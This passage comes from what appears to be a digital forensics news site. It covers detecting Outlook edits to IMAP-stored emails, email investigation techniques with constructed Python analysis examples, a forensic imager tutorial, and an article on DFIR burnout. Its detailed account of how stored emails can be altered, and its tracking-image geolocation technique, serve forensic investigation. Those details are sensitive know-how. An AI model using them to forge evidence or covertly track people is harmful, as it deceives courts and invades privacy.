If a date-time is specified, the internal date SHOULD be set in
the resulting message; otherwise, the internal date of the
resulting message is set to the current date and time by default.

In this case, because a date-time was specified, the Internal Date message attribute was preserved. Depending on the IMAP server and the email client that was used, you may find that the Internal Date message attribute sometimes reflects the time when the altered message was synced back to the mailbox.

After the APPEND command, Outlook set the “\Deleted” IMAP flag on the original message. Finally, Outlook issued a UID EXPUNGE command (defined by the UIDPLUS extension, RFC 4315, rather than by the base IMAP specification) to permanently remove the original message from the mailbox. None of these steps modifies a message in place: IMAP has no command for that, so any “edit” of a stored message is necessarily an append of a new message followed by removal of the old one, and that is what leaves the metadata trail described here.
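The following is an added example, not the author’s tooling and not code from Outlook or Gmail, that models the sequence above in Python. It is a toy IMAP folder that assigns UIDs the way RFC 3501 requires (strictly ascending, never reused) and implements the three commands Outlook issued; the messages and dates are constructed. It also shows the two checks the server-metadata comparison relies on: diffing a baseline acquisition against a re-acquisition, and spotting a UID that is out of sequence once the folder is sorted by INTERNALDATE. The preserve_date=False path models a client that omits the date-time argument, the case mentioned earlier where INTERNALDATE ends up as the sync time.

```python
"""Toy model of APPEND / STORE \\Deleted / UID EXPUNGE and the checks that expose it.
Added example with constructed messages; not a real IMAP implementation."""
import hashlib
from dataclasses import dataclass, field
from datetime import datetime, timezone
from typing import Optional


@dataclass
class Msg:
    uid: int
    internal_date: datetime            # the IMAP INTERNALDATE attribute
    raw: bytes                         # the RFC 5322 message as stored
    flags: set = field(default_factory=set)


class Mailbox:
    """Toy IMAP folder. UIDs are strictly ascending and never reused (RFC 3501, 2.3.1.1)."""

    def __init__(self) -> None:
        self.msgs: list = []
        self.uidnext = 1

    def append(self, raw: bytes, date_time: Optional[datetime] = None,
               now: Optional[datetime] = None) -> int:
        # RFC 3501 APPEND: "If a date-time is specified, the internal date SHOULD be set
        # in the resulting message; otherwise ... the current date and time".
        internal = date_time if date_time is not None else (now or datetime.now(timezone.utc))
        uid, self.uidnext = self.uidnext, self.uidnext + 1
        self.msgs.append(Msg(uid, internal, raw))
        return uid

    def get(self, uid: int) -> Msg:
        return next(m for m in self.msgs if m.uid == uid)

    def store_deleted(self, uid: int) -> None:        # UID STORE <uid> +FLAGS (\Deleted)
        self.get(uid).flags.add("\\Deleted")

    def uid_expunge(self, uid: int) -> None:          # UID EXPUNGE <uid>, UIDPLUS (RFC 4315)
        self.msgs = [m for m in self.msgs if not (m.uid == uid and "\\Deleted" in m.flags)]

    def snapshot(self) -> dict:
        """What an acquisition records per message: UID -> hash of the stored bytes."""
        return {m.uid: hashlib.sha256(m.raw).hexdigest() for m in self.msgs}

    def by_internal_date(self) -> list:
        return sorted(self.msgs, key=lambda m: (m.internal_date, m.uid))


def outlook_edit(mbox: Mailbox, uid: int, new_raw: bytes, now: datetime,
                 preserve_date: bool = True) -> int:
    """The three-step sequence observed above. preserve_date=False models a client
    that omits the date-time argument, so INTERNALDATE becomes the sync time."""
    original = mbox.get(uid)
    new_uid = mbox.append(new_raw, original.internal_date if preserve_date else None, now=now)
    mbox.store_deleted(uid)
    mbox.uid_expunge(uid)
    return new_uid


def out_of_order_uids(mbox: Mailbox) -> list:
    """UIDs higher than the UID of some later-dated message once the folder is sorted by
    INTERNALDATE: the signature of a message re-introduced by a back-dated APPEND."""
    msgs = mbox.by_internal_date()
    flagged = []
    for i, m in enumerate(msgs):
        later = [n.uid for n in msgs[i + 1:]]
        if later and m.uid > min(later):
            flagged.append(m.uid)
    return flagged


def diff_snapshots(before: dict, after: dict) -> tuple:
    """UIDs only in the baseline (expunged) and only in the re-acquisition (appended)."""
    return set(before) - set(after), set(after) - set(before)


def simulate(preserve_date: bool) -> tuple:
    """Five constructed messages dated 1-5 Nov 2018; message 3 is edited on 23 Jan 2019."""
    mbox = Mailbox()
    for day in range(1, 6):
        mbox.append(f"Subject: message {day}\r\n\r\nbody {day}\r\n".encode(),
                    date_time=datetime(2018, 11, day, 17, 43, 28, tzinfo=timezone.utc))
    baseline = mbox.snapshot()
    sync_time = datetime(2019, 1, 23, 21, 41, 12, tzinfo=timezone.utc)
    outlook_edit(mbox, 3, b"Subject: message 3 (edited)\r\n\r\nbody 3 changed\r\n",
                 sync_time, preserve_date)
    removed, added = diff_snapshots(baseline, mbox.snapshot())
    return out_of_order_uids(mbox), removed, added


if __name__ == "__main__":
    print(simulate(True))    # back-dated APPEND: UID 6 sits out of sequence among 1-5
    print(simulate(False))   # INTERNALDATE = sync time: UID order looks normal, only the diff tells
```

The second run is the important caveat: when the client does not back-date the appended copy, sorting by INTERNALDATE shows nothing unusual, and only the baseline-versus-re-acquisition diff (UID 3 gone, UID 6 new, same Message-ID) reveals the replacement. That is the practical argument for acquiring early and acquiring more than once.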

Message Data and Metadata

Unlike scenarios where the suspect edits an existing message with a text editor and uploads it to the IMAP server, here I used Outlook to alter the message. Let’s take a look at how the manipulated email message in Gmail looks different than the original.

Message Size and Body

Editing the message using Outlook and saving it caused it to almost double in size. The total size of the message increased from 66.9 KB to 121 KB. This was mostly because of the formatting information Outlook inserted into the document.

The “ProgId”, “Generator”, and “Originator” meta tags were populated with the values “Word.Document”, “Microsoft Word 15”, and again “Microsoft Word 15” respectively—not unlike a Word document saved in HTML format.

Upon looking at the part where I had edited the message body, I found that Outlook managed to update both the HTML and the plain text versions of the message body consistently.

MIME Boundary Delimiters

The MIME boundary delimiter of the original message was “=-FqYpb1xnVuagRE/vpmLO”. After the edits, it was changed to “----=_NextPart_000_0000_01D4B364.5C460060”.

Note that the last part of the new MIME boundary delimiter, 01D4B364.5C460060 (6000465C64B3D401 in reverse byte order), is a Windows FILETIME value: a 64-bit count of 100-nanosecond intervals since 1 January 1601, expressed in UTC. Decoding the FILETIME value results in 01/23/2019 21:41:12.6780000 UTC. This is not the time when the original message was edited and saved in Outlook, but the time when the edited message was synced back to Gmail by Outlook. The timestamp has millisecond precision (the trailing digits are zero), and it carries no time zone offset because FILETIME values are always UTC (thanks, Charles Platt, for spotting this!).
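Decoding the boundary by hand is error-prone, so here is an added example (not the author’s code) that does it in Python. The boundary shape it matches, ----=_NextPart_NNN_NNNN_HHHHHHHH.HHHHHHHH with the final field being the high and low halves of a FILETIME, is the one described above; the sample message it is run on is constructed around the boundary quoted in the text, and any other boundary style decodes to None.

```python
"""Decode the FILETIME hidden in Outlook MIME boundaries (added example, constructed message)."""
import email
import re
from datetime import datetime, timedelta, timezone
from email import policy
from typing import Optional

# Outlook builds boundaries as ----=_NextPart_NNN_NNNN_HHHHHHHH.HHHHHHHH; the last field
# is the high and low 32-bit halves of a Windows FILETIME.
OUTLOOK_BOUNDARY = re.compile(r"=_NextPart_\d{3}_\d{4}_([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})$")
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(filetime: int) -> datetime:
    """A FILETIME is a count of 100-nanosecond intervals since 1601-01-01 00:00 UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=filetime // 10)


def boundary_filetime(boundary: str) -> Optional[int]:
    """The FILETIME embedded in an Outlook-style boundary, or None for any other style."""
    m = OUTLOOK_BOUNDARY.search(boundary)
    if m is None:
        return None
    high, low = (int(half, 16) for half in m.groups())
    return (high << 32) | low


def boundary_timestamp(boundary: str) -> Optional[datetime]:
    ft = boundary_filetime(boundary)
    return None if ft is None else filetime_to_datetime(ft)


def boundary_le_hex(boundary: str) -> Optional[str]:
    """The same value as it appears in a little-endian hex dump (the 'reverse byte order' form)."""
    ft = boundary_filetime(boundary)
    return None if ft is None else ft.to_bytes(8, "little").hex().upper()


def message_boundary_timestamps(raw: str) -> list:
    """Every multipart boundary in a message, paired with its decoded time (None if not Outlook-style)."""
    msg = email.message_from_string(raw, policy=policy.default)
    return [(part.get_boundary(), boundary_timestamp(part.get_boundary()))
            for part in msg.walk() if part.get_boundary()]


# Constructed message built around the boundary quoted in the text.
SAMPLE = """\
From: Alice <alice@example.com>
To: Bob <bob@example.net>
Subject: Play games while you ride your horse
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="----=_NextPart_000_0000_01D4B364.5C460060"

This is a multi-part message in MIME format.

------=_NextPart_000_0000_01D4B364.5C460060
Content-Type: text/plain; charset="us-ascii"

I used to drive 4 hours a day to get to San Diego

------=_NextPart_000_0000_01D4B364.5C460060
Content-Type: text/html; charset="us-ascii"

<html><body><p>I used to drive 4 hours a day to get to San Diego</p></body></html>

------=_NextPart_000_0000_01D4B364.5C460060--
"""

if __name__ == "__main__":
    for boundary, when in message_boundary_timestamps(SAMPLE):
        print(boundary, "->", when, "| little-endian:", boundary_le_hex(boundary))
```

Because FILETIME is UTC, the decoded value can be compared directly with the server’s INTERNALDATE and with the Date header after normalising the latter’s offset; a boundary time that post-dates the Date header by weeks, as here, is the tell.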

Header Fields

When the message was edited using Outlook, the header block shrank from 4,950 bytes to 2,184 bytes. This was mostly because Outlook stripped out several lengthy header fields such as “DKIM-Signature” and “Authentication-Results”. Their absence is evidence in itself: a message from this sender with no DKIM signature or authentication results, while its neighbours carry both, can no longer be verified against the sender’s domain, and had the original DKIM-Signature survived it would in any case have failed verification against the altered subject and body.

The Message-Id header field was preserved.

One significant change was to the Origination Date (i.e., “Date” field in the header). The “Date” field of the original message read:

Date: Mon, 5 Nov 2018 17:43:28 +0000

After the edits in Outlook, the “Date” field of the modified email became:

Date: Mon, 5 Nov 2018 09:43:28 -0800

While both timestamps refer to the same point in time, the manipulation in Outlook caused the “Date” field to reflect the time zone where the edits were made!

The “Subject” header field also changed as expected. It was originally an RFC 2047 encoded-word (UTF-8, Q-encoding) to accommodate the “oncoming automobile” emoji (\xF0\x9F\x9A\x98):

Subject: =?UTF-8?Q?Play_games_while_you_drive_=F0=9F=9A=98?=

After my edits, the new Subject header field became:

Subject: Play games while you ride your horse

Outlook also added a few new header fields such as:

X-Mailer: Microsoft Outlook 16.0
X-OlkEid: 00000000E99D742F177E4948AB97502B6BAC12160700C3B68E10F77511CEB4CD00AA00BBB6E600000000000C
0000D9539C2261A6BB45B9DAB62C7081B3C10100E800000000006A8B4A45F8869849BA81A810114C7889
Thread-Index: AQGfn39hkC1I90ybIjXNvTnfAiwDDg==

Note that Outlook 16.0 matches the version of Outlook (2016) I used to edit the message.

Conclusions

This exercise shows just how easy Outlook makes it for an end user to edit an email message that’s on the server.

In this case, examining the server metadata along with the message itself made it clear that the message was manipulated. The manipulated email had, among other things:

  • An out-of-order UID
  • Artifacts in the message header and body that were inconsistent with other messages from the same sender
  • A time zone offset in its Origination Date that was inconsistent with those of other messages from the same sender, and that matched the time zone where the message was manipulated
  • Its X-Mailer header field populated with the name and version of the email client that was used to alter the message
  • A new MIME boundary delimiter which contains a timestamp reflecting the time the altered message was reintroduced to Gmail
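The indicators listed above can be checked mechanically against a sender’s other messages. The following added example, not from the original post, builds constructed versions of the original, the manipulated copy and two untouched “neighbour” messages from the same sender (with placeholder DKIM values and placeholder Outlook identifiers) and reports the Date offset anomaly, the stripped and newly introduced header fields, and whether the Message-ID and the Date instant survived. It does not decode the MIME boundary, which is a separate check.

```python
"""Header consistency of one message against the sender's other messages (added example)."""
import email
from email import policy
from email.utils import parsedate_to_datetime
from typing import Optional


def constructed_message(date: str, subject: str, message_id: str, body: str,
                        authenticated: bool = True, extra_headers: str = "") -> str:
    """Build a constructed RFC 5322 message. DKIM and authentication values are placeholders."""
    auth = ""
    if authenticated:
        auth = ("DKIM-Signature: v=1; a=rsa-sha256; d=example.com; s=sel; h=from:to:subject:date;"
                " bh=PLACEHOLDER=; b=PLACEHOLDER=\n"
                "Authentication-Results: mx.example.net; dkim=pass header.d=example.com\n")
    return (
        "Received: from mail.example.com (mail.example.com [203.0.113.5]) "
        f"by mx.example.net with ESMTPS; {date}\n"
        f"{auth}"
        "From: Alice <alice@example.com>\n"
        "To: Bob <bob@example.net>\n"
        f"Subject: {subject}\n"
        f"Date: {date}\n"
        f"Message-ID: {message_id}\n"
        "MIME-Version: 1.0\n"
        "Content-Type: text/plain; charset=utf-8\n"
        f"{extra_headers}\n{body}\n"
    )


# Two untouched messages from the same sender: the "neighbours" worth acquiring.
REFERENCE = [
    constructed_message("Fri, 2 Nov 2018 15:10:02 +0000", "Lunch next week?",
                        "<20181102151002.7@example.com>", "Free on Tuesday?"),
    constructed_message("Tue, 6 Nov 2018 08:22:41 +0000", "Re: slides",
                        "<20181106082241.9@example.com>", "Attached."),
]
# Baseline copy of the message of interest, and the copy re-introduced by the editing client.
ORIGINAL = constructed_message("Mon, 5 Nov 2018 17:43:28 +0000",
                               "=?UTF-8?Q?Play_games_while_you_drive_=F0=9F=9A=98?=",
                               "<20181105174328.1@example.com>",
                               "I used to drive 4 hours a day to get to SF")
SUSPECT = constructed_message("Mon, 5 Nov 2018 09:43:28 -0800",
                              "Play games while you ride your horse",
                              "<20181105174328.1@example.com>",
                              "I used to drive 4 hours a day to get to San Diego",
                              authenticated=False,
                              extra_headers="X-Mailer: Microsoft Outlook 16.0\n"
                                            "X-OlkEid: PLACEHOLDER\nThread-Index: PLACEHOLDER\n")


def header_profile(raw: str) -> dict:
    msg = email.message_from_string(raw, policy=policy.default)
    date = parsedate_to_datetime(str(msg["Date"]))
    return {
        "names": {name.lower() for name in msg.keys()},
        "offset": date.strftime("%z"),            # the zone the Date header was written in
        "instant": date,                          # the absolute time it denotes
        "message_id": str(msg["Message-ID"]).strip(),
        "size": len(raw.encode()),
    }


def compare(suspect_raw: str, reference_raws: list, original_raw: Optional[str] = None) -> dict:
    """Header-level consistency of one message against the sender's other messages."""
    suspect = header_profile(suspect_raw)
    refs = [header_profile(r) for r in reference_raws]
    sender_offsets = sorted({r["offset"] for r in refs})
    always_present = set.intersection(*(r["names"] for r in refs))
    ever_present = set.union(*(r["names"] for r in refs))
    result = {
        "date_offset": suspect["offset"],
        "sender_offsets": sender_offsets,
        "offset_anomaly": suspect["offset"] not in sender_offsets,
        "missing_headers": sorted(always_present - suspect["names"]),   # stripped by the editor
        "novel_headers": sorted(suspect["names"] - ever_present),       # introduced by the editor
    }
    if original_raw is not None:
        original = header_profile(original_raw)
        result["same_message_id"] = suspect["message_id"] == original["message_id"]
        result["same_instant"] = suspect["instant"] == original["instant"]
        result["size_ratio"] = round(suspect["size"] / original["size"], 2)
    return result


if __name__ == "__main__":
    for key, value in compare(SUSPECT, REFERENCE, ORIGINAL).items():
        print(f"{key:>16}: {value}")
```

Two reference messages are the bare minimum; in practice the offset and header-set baselines should be built from as many of the sender’s messages as the mailbox holds, and a sender who travels will legitimately show more than one offset, so the anomaly is a lead to corroborate with the server metadata rather than a conclusion on its own.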

When forensically authenticating emails, it is important that forensic examiners capture not only the message of interest but also its neighbors and server metadata. Examining the suspect message in isolation prevents the examiner from analyzing valuable contextual evidence that lives on the server.

References:
RFC 5322: Internet Message Format
RFC 3501: Internet Message Access Protocol - Version 4rev1
RFC 4315: Internet Message Access Protocol (IMAP) - UIDPLUS extension
RFC 2045: Multipurpose Internet Mail Extensions (MIME) Part One: Format of Internet Message Bodies
Forensic Focus Post

About The Author

Arman Gungor, CCE, is a digital forensics and eDiscovery expert and the founder of Metaspike. He has over 21 years’ computer and technology experience and has been appointed by courts as a neutral computer forensics expert as well as a neutral eDiscovery consultant.

Email Forensics: Investigation Techniques


by Chirath De Alwis

Due to the rapid spread of internet use all over the world, email has become a primary communication medium for many official activities. Not only companies, but also members of the public tend to use emails in their critical business activities such as banking, sharing official messages, and sharing confidential files. However, this communication medium has also become vulnerable to attacks. This article focuses on email architecture and existing investigation techniques used by forensic investigators.

Email Architecture

When a user sends an email, it does not travel directly to the recipient’s mail server; it passes through several servers on the way. The Mail User Agent (MUA) is the program used to compose and read messages at the client end, for example Outlook Express, the Gmail web interface, or Lotus Notes [1]. The Mail Transfer Agent (MTA) is the server that accepts the message from the MUA. It reads the envelope and header information to determine where the message is going and relays it to the MTA responsible for the recipient’s domain, possibly through intermediate relays [1]. Every MTA that handles the message prepends a “Received” header recording the host it received the message from, its own name, and a timestamp. The final MTA delivers the message into the recipient’s mailbox, from which the recipient’s MUA retrieves it. An email header therefore carries a trail of server information, including IP addresses, for every hop the message took.

Email Identities and Data

The primary evidence in email investigations is the email header, which holds a considerable amount of information about the message’s origin and path. Header analysis should proceed from bottom to top: “Received” lines are prepended by each server in turn, so the bottom-most one was written by the first server to handle the message (closest to the sender) and the top-most by the last (the recipient’s server). The previous section showed that email travels through multiple MTAs; each of them leaves its trace in the header. The following picture depicts a sample header.

In order to understand the header information, it is necessary to understand the structured set of fields available in the header. The following are some of the basic field names and descriptions.

Email Forensic Investigation Techniques

Email forensics refers to analyzing the source and content of emails as evidence. Investigation of email related crimes and incidents involves various approaches.

Header Analysis

Email header analysis is the primary analytical technique: it examines the metadata the header carries. Header analysis identifies a large share of email-related offences, including spoofing, phishing, spam, scams and internal data leakage. One caveat applies: the sender controls everything in the message up to the first “Received” line added by a server the investigator trusts, so “Received” lines below that point, as well as “From”, “Date” and “Message-ID”, can be forged and should be corroborated against server logs.

Server Investigation

This involves investigating copies of delivered emails and server logs. Organisations that run their own internal mail servers provide mailboxes for their employees; in that case the investigation involves extracting the entire mailbox relevant to the case together with the server logs, which record envelope data (SMTP sender and recipient, connecting IP address and timestamps) that the message header alone may not show.

Network Device Investigation

In some investigations, the investigator needs the logs maintained by network devices such as routers, firewalls and switches to trace the source of an email message. This is often a complex situation in which the primary evidence is not present, for example when the ISP or proxy does not maintain logs, or the ISP does not cooperate [2].

Software Embedded Analysis

Some information about the sender of the email, attached files or documents may be included with the message by the email software used by the sender for composing the email [2]. This information may be included in the form of custom headers or in the form of MIME content as a Transport Neutral Encapsulation Format (TNEF)[2].

Sender Mail Fingerprints

The “Received” field includes tracking information generated by each mail server that has handled a message, listed in reverse chronological order (newest at the top). The “X-Mailer” or “User-Agent” field names the software that composed the message. Analysing these fields helps to establish the software and version the sender used, which can then be compared with the sender’s other messages; a change of mailer within one conversation is worth a closer look.
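Here is an added example in Python, not from the article or its references, that walks the “Received” chain bottom-up as described, extracts the connecting IP address and timestamp of each hop, computes the delay between hops, reads the mailer fingerprint, and compares the “From” domain with the envelope sender recorded in “Return-Path”. The message is constructed with documentation addresses (RFC 5737), invented host names and an invented mailer string.

```python
"""Walk a Received: chain oldest-hop-first and pull out sender-side facts (added example)."""
import email
import re
from email.utils import parseaddr, parsedate_to_datetime

# Constructed message. The three Received lines read top-down newest to oldest,
# exactly as a delivered message's header does.
RAW = """\
Received: from mx2.example.net (mx2.example.net [198.51.100.20]) by mailstore.example.net with LMTP id AAA; Thu, 14 Feb 2019 10:02:11 +0000
Received: from relay.example.org (relay.example.org [192.0.2.45]) by mx2.example.net with ESMTPS id BBB; Thu, 14 Feb 2019 10:02:09 +0000
Received: from [10.0.0.7] (unknown [203.0.113.77]) by relay.example.org with ESMTPA id CCC; Thu, 14 Feb 2019 10:01:58 +0000
Return-Path: <sender@example.org>
From: "Accounts" <accounts@bank.example.com>
To: victim@example.net
Subject: Verify your account
Date: Thu, 14 Feb 2019 10:01:55 +0000
Message-ID: <20190214100155.CCC@relay.example.org>
X-Mailer: ExampleMailer 1.2

Please confirm your details at the link below.
"""

HOP_RE = re.compile(r"from\s+(?P<helo>\S+)(?P<extra>.*?)\s+by\s+(?P<by>\S+)", re.S)
IPV4_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def parse_received(value: str) -> dict:
    """Split one Received: value into HELO name, connecting IP, receiving host and timestamp."""
    value = " ".join(value.split())                 # unfold continuation lines
    m = HOP_RE.search(value)
    # The peer address is the last bracketed IP before "by"; the HELO name is sender-supplied.
    ips = IPV4_RE.findall(value[:m.end("extra")] if m else value)
    stamp = value.rsplit(";", 1)[1].strip() if ";" in value else None
    return {
        "helo": m.group("helo") if m else None,
        "by": m.group("by") if m else None,
        "ip": ips[-1] if ips else None,
        "time": parsedate_to_datetime(stamp) if stamp else None,
    }


def domain_of(address_header: str) -> str:
    return parseaddr(address_header or "")[1].rpartition("@")[2].lower()


def analyze(raw: str) -> dict:
    msg = email.message_from_string(raw)
    # Servers prepend Received lines, so reversing header order gives chronological order.
    hops = [parse_received(v) for v in reversed(msg.get_all("Received", []))]
    delays = [int((b["time"] - a["time"]).total_seconds()) for a, b in zip(hops, hops[1:])]
    from_domain = domain_of(msg.get("From"))
    return_path_domain = domain_of(msg.get("Return-Path"))
    return {
        "hops": [(h["helo"], h["ip"], h["by"], h["time"].isoformat()) for h in hops],
        "origin_ip": hops[0]["ip"] if hops else None,
        "delays_seconds": delays,
        # Negative or very long gaps suggest clock skew or an inserted (forged) Received line.
        "odd_delays": [d for d in delays if d < 0 or d > 3600],
        "from_domain": from_domain,
        "return_path_domain": return_path_domain,
        "envelope_mismatch": bool(from_domain and return_path_domain
                                  and from_domain != return_path_domain),
        "mailer": msg.get("X-Mailer") or msg.get("User-Agent"),
    }


if __name__ == "__main__":
    for key, value in analyze(RAW).items():
        print(f"{key:>20}: {value}")
```

The origin IP reported here is only as trustworthy as the server that wrote the bottom-most “Received” line: anything below the first hop operated by a party the investigator trusts could have been typed in by the sender. Likewise an envelope mismatch is a lead rather than proof of spoofing, since mailing lists and forwarders legitimately rewrite the envelope sender.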

Use of Email Trackers

In some situations, attackers use different techniques and locations to send their emails, and establishing the sender’s geographical location becomes important. To approximate that location, investigators sometimes embed an email tracker (typically a remote image) in the body of a message sent to the suspect. When the recipient opens the message and the tracker is loaded, the investigator is notified of the IP address from which it was fetched, which can then be geolocated. The result is approximate at best: IP geolocation has coarse resolution, a proxy, VPN or Tor exit node hides the true origin, and many mail clients block remote images by default, so the tracker may never fire. An active technique like this also requires appropriate legal authority before use. It has been used to identify suspects in murder or kidnapping cases where the criminal communicated via email.

Volatile Memory Analysis

Recent research has been conducted in analyzing spoofed mails from volatile memory [3]. Since everything passes through volatile memory, it is possible to extract email related evidence (header information) from volatile memory.

Attachment Analysis

Most viruses and malware are delivered as email attachments, so investigating attachments is crucial in any email-related investigation; leakage of confidential information through attachments is another important line of inquiry. Software tools are available to recover email-related data, including attachments, from computer hard disks. For suspicious attachments, investigators can submit the file to a multi-engine scanning service such as VirusTotal [4] to check whether it is known malware. Two caveats apply. A clean result is not a guarantee that the file is safe, so a file that passes should still be examined in a sandbox environment such as Cuckoo [5]. And uploading a file shares it with the service and its partners, which may be unacceptable for evidence that is confidential or subject to legal hold; looking up the file’s hash first avoids disclosing the file itself.
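As an added example, not part of the article, the following Python extracts the attachments from a message, records the hashes an examiner would look up rather than uploading the file, and flags the obvious warning signs (executable magic bytes, risky or double extensions). The message and its “attachment”, a 64-byte stand-in consisting of nothing but an MZ header, are constructed; the lists of magic values and risky extensions are deliberately short.

```python
"""Hash and fingerprint attachments without the file leaving the examiner's machine (added example)."""
import base64
import email
import hashlib
from email import policy

MAGIC = {b"MZ": "PE/DOS executable", b"\x7fELF": "ELF executable",
         b"%PDF": "PDF", b"PK\x03\x04": "ZIP container (also Office OOXML)"}
RISKY_EXT = {"exe", "scr", "com", "js", "vbs", "hta", "lnk", "docm", "xlsm", "jar"}

# Constructed stand-in for an executable attachment: an MZ header and nothing else.
ATTACHMENT = b"MZ" + bytes(62)

_RAW_TEMPLATE = """\
From: Accounts <accounts@example.com>
To: victim@example.net
Subject: Invoice 4471
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset=utf-8

Please see the attached invoice.
--b1
Content-Type: application/octet-stream; name="invoice.pdf.exe"
Content-Disposition: attachment; filename="invoice.pdf.exe"
Content-Transfer-Encoding: base64

{b64}
--b1--
"""
RAW = _RAW_TEMPLATE.format(b64=base64.b64encode(ATTACHMENT).decode())


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def magic_type(data: bytes) -> str:
    for prefix, name in MAGIC.items():
        if data.startswith(prefix):
            return name
    return "unknown"


def triage_attachments(raw: str) -> list:
    """One record per attachment: hashes to look up, declared versus actual type, naming tricks."""
    msg = email.message_from_string(raw, policy=policy.default)
    report = []
    for part in msg.iter_attachments():
        data = part.get_content()
        if isinstance(data, str):                      # text/* attachments come back decoded
            data = data.encode(part.get_content_charset() or "utf-8")
        name = part.get_filename() or "(unnamed)"
        exts = name.lower().split(".")[1:]
        report.append({
            "filename": name,
            "declared_type": part.get_content_type(),
            "size": len(data),
            "sha256": sha256_hex(data),                # look this up before ever uploading the file
            "md5": hashlib.md5(data, usedforsecurity=False).hexdigest(),  # older feeds key on MD5
            "magic_type": magic_type(data),
            "risky_extension": bool(exts) and exts[-1] in RISKY_EXT,
            "double_extension": len(exts) >= 2 and exts[-1] in RISKY_EXT,
        })
    return report


if __name__ == "__main__":
    for record in triage_attachments(RAW):
        for key, value in record.items():
            print(f"{key:>17}: {value}")
```

Running the triage on the .eml preserves the evidence workflow: the hashes can be checked against VirusTotal or an internal threat-intelligence feed, and only if nothing is known does the file itself need to be detonated, in an isolated sandbox rather than a shared upload.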

References

  1. Guo, H., Jin, B. and Qian, W. (2013). Analysis of Email Header for Forensics Purpose. [Online]. Available from: https://ieeexplore.ieee.org/document/6524415 [Accessed: 14 February 2019].
  2. Banday, M. T. (2011). Techniques and Tools for Forensic Investigation of Email. [Online]. Available from: https://pdfs.semanticscholar.org/8625/a3b17d199e5cabbb796bad0df56a7979c77c.pdf [Accessed: 14 February 2019].
  3. Iyer, R. P. et al. (2017). Email spoofing detection using volatile memory forensics. [Online]. Available from: https://ieeexplore.ieee.org/document/8228692 [Accessed: 14 February 2019].
  4. VirusTotal (2019). [Online]. Available from: https://www.virustotal.com/ [Accessed: 14 February 2019].
  5. Cuckoo Sandbox (2019). [Online]. Available from: https://cuckoosandbox.org/ [Accessed: 14 February 2019].

About The Author

Chirath De Alwis is an information security professional with more than four years’ experience in the information security domain. He holds a BEng (Hons), a PGDip and eight professional certifications in cyber security, and is currently reading for an MSc specialising in cyber security. Chirath is involved in vulnerability management, threat intelligence, incident handling and digital forensics activities in Sri Lankan cyberspace. You can contact him at chirathdealwis@gmail.com.

How To Install And Use The Optional Thunderbolt I/O Card On Logicube’s Falcon-NEO


Welcome to Logicube’s tutorial on the optional Thunderbolt I/O card on the Forensic Falcon-NEO. In this session, we’ll show you how to install and use this card.

The optional Thunderbolt I/O card connects directly to the Falcon-NEO’s source or destination I/O card ports. It allows you to image directly to or from Thunderbolt 3 (USB-C) and USB 3.1 Gen 2 external drives and enclosures. The Thunderbolt card comes with a labelled replacement door for the Falcon-NEO, along with a small screwdriver.

To install the card, first turn the Falcon-NEO over to see three port doors: two on the source side and one on the destination side. Begin by removing the door from the port where you want to insert the card. Once the door is removed, you will see a yellow and black cable which has a connector on one end. This connector should be inserted into the power port on the I/O card.

Once the cable is connected, proceed to slide the cable into the port, and slide the pin side of the card into the socket at the back of the port. You will then need to use the supplied screwdriver to screw down the two small screws on the left and right side of the card, into the post seen here.

Once the card is firmly installed, you can then proceed to slide the labelled door over the port and insert the screw to lock it in place. You will now see the Thunderbolt USB-C port connector exposed, and you’re ready to connect any Thunderbolt USB-C, USB 3.1 Gen 2, external drive or storage enclosure to the Falcon-NEO and begin imaging, wiping or hashing these drives.

Any Thunderbolt external drive or storage enclosure connected to the I/O port will show up as a source or destination, depending where you’ve installed the I/O card and connected the drive, within the Falcon-NEO GUI as seen here.

Adding the Thunderbolt 3 USB C I/O card to the Falcon-NEO ensures forensic investigators are prepared to capture evidence data from these types of devices when they are encountered in the field or in the lab. Organisations using large capacity Thunderbolt storage enclosures for evidence data collection can now take advantage of Thunderbolt 3 technology’s blazing fast transfer speeds to shorten the acquisition process.

Thank you for your interest in Logicube’s premier forensic imager, Falcon-NEO. We hope you found this tutorial informative. To learn more about the Falcon-NEO, please visit our website at http://www.logicube.com or contact our sales team at sales@logicube.com.

Burnout in DFIR (And Beyond)


by Christa Miller

Quite a lot has been written over recent weeks about burnout. Not only DFIR-specific posts, first from Richard Bejtlich and then, in follow-up from Eric Huber and Brett Shavers; but also news articles including:

Clearly, as The Guardian relates, the problem is endemic across industries, professions, and organizations. Yet burnout in the digital forensics world is unique. In addition to more typical work and life pressures, digital forensic examiners are faced with traumatic images and audio, long hours, and justice that often seems to be unevenly applied. Few other people understand the job or its stressors, and for those working counterterror investigations, operational security limits the possibility of “talk therapy” even further.

What is burnout, and how do you identify it?

In his blog, Bejtlich reflects:

Starting in late 2014 and progressing in 2015, I became less interested in security. I was aggravated every time I saw the same old topics arise in social or public media. I did not see the point of continuing to debate issues which were never solved. I was demoralized and frustrated.

The Mayo Clinic defines job burnout as “a special type of work-related stress — a state of physical or emotional exhaustion that also involves a sense of reduced accomplishment and loss of personal identity.”

Burnout isn’t, however, a medical diagnosis, so defining it beyond “work-related stress” can be tricky. In some ways, it’s similar to depression. You might:

  • Lack the energy to be productive, to go to the office, or even to get out of bed on workdays.
  • Have trouble concentrating, or lose interest in otherwise enjoyable activities.
  • Experience changes in sleep habits or the state of your physical health.
  • Use food, alcohol, or drugs to numb out — or on the flip side, to try to feel something.

On the other hand, if limited only to work — you feel you come alive on weekends and holidays, for example — it may be burnout, and not depression. The Mayo Clinic’s article lists several other burnout-specific symptoms, including cynicism or irritability in the work environment, disillusionment with your job or workplace, or lack of a sense of satisfaction in your own accomplishments.

Conversely, as described in these pieces from Forbes and Inc, you might feel the need to “prove” yourself, working harder and longer hours. You don’t enjoy it, but because you’re convinced that no one wants to sit in your dark hole with you and you’re determined to find your way out, you stick with it.

Where does burnout come from?

Burnout, like other chronic conditions, is cumulative, and multiple factors often play into it. A 2014 PoliceOne.com article describes a variety of root causes of burnout in police officers. Among others, these causes often include:

  • Shift work and overtime that can isolate you from family and friends, especially if you can’t choose shifts or you have to miss holidays and family events.
  • Policies or procedures that seem more bureaucratic than beneficial, making it difficult to work efficiently or effectively.
